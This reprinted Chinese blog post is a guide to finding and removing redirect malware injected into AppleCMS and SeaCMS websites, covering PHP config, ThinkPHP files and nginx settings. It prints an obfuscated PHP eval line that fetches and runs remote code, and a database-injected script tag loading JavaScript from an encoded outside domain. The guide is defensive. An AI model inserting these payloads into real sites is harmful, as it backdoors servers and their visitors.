网站挂马案例 苹果cms 海洋cms 持续更新【转载】

2022.7.1 苹果cms 1732

注意:所有的检测均建立在百度关键词或site:网站 从百度过来的目标来检测网站 直接访问则不触发挂马代码

海洋cms (在手机上的百度浏览器app里网站访问竟然是白板):

罪魁祸首(挂马): 所在位置 /include/common.php

$isMobile=isMobile();
if($isMobile){$GLOBALS[‘isMobile’]=1;}else{$GLOBALS[‘isMobile’]=0;}
ini_set(“display_errors”, “off”); eval(‘?>’.file_get_contents(pack(‘H*’,str_rot13(‘687474703n2s2s7777772r6n6r68363738392r636s6q2s616p6p2r747874’))));

苹果cms 常见挂马:

/application/extra 下的 thinkphp.php  和 maccache.php  以及可疑未知文件均为挂马

部分苹果cms 的 upload 或者 uploads 目录下会有php文件 第一删除文件 第二 防火墙设置此目录下禁止执行php文件

如果上面所提目录已出现php文件则检查你的 /thinkphp 目录下的 base.php start.php 和 /thinkphp/library/think/Loader.php 等文件 文件末端会有 类似于判断android ipa iphone  baidu  360 google 等字样的代码均为挂马代码

php挂马案例:

在服务器上创建个单页面网站php版本选择可疑php还会跳明明没有任何程序 那就该考虑php挂马的问题了

举例:php 5.6被挂了 :

打开5.6所在目录 (每个服务器可能目录不太一样) /www/server/php/56/etc 打开 php.ini和php-cli.ini 寻找参数 auto_prepend_file  是否有值 有值则不正常 尤其是映入眼帘的一大串base64的代码绝对是挂马

ng挂马案例:

当排查挂马以上都找不到问题 那可能考虑ng 排查ng挂马方法 创建一个纯静态站 访问里面的单页面发现也跳 那就是挂马了

目前发现并找到位置的案例:

/www/server/nginx/conf 下的 mime.types 里的 出现sub_filter 参数 出现则被挂马了

以上还找不到但明确是ng挂马

则还有一种ng挂马 现未找到位置和解决方案 则需要重装ng

防患于未然,所有技术和不怀好意的黑客都会不断地更新技术手段,我们能做到的就是 开启宝塔防篡改和锁表以及掩盖服务器真实IP

数据库挂马临时解决:

目前所有数据库挂马为 <script src=https://%37%38%30%65%2e%63%6f%6d/t.js></script>

利用 ng挂马原理 把https://%37%38%30%65%2e%63%6f%6d/t.js替换

sub_filter https://%37%38%30%65%2e%63%6f%6d/t.js ‘favicon.ico’;
sub_filter_once on;
sub_filter_types *;

注意加在 } 后面

不用重启ng

网站挂马案例 苹果cms 海洋cms 持续更新【转载】 苹果cms-第1张

原文地址:https://p90.top/index.php?s=/news-read-id-108.html

本文地址:https://www.51logou.cn/497.html
原创作者:【
转载请注明出处:【51源代码

相关推荐:相关教程

评论

昵称*

邮箱*

验证码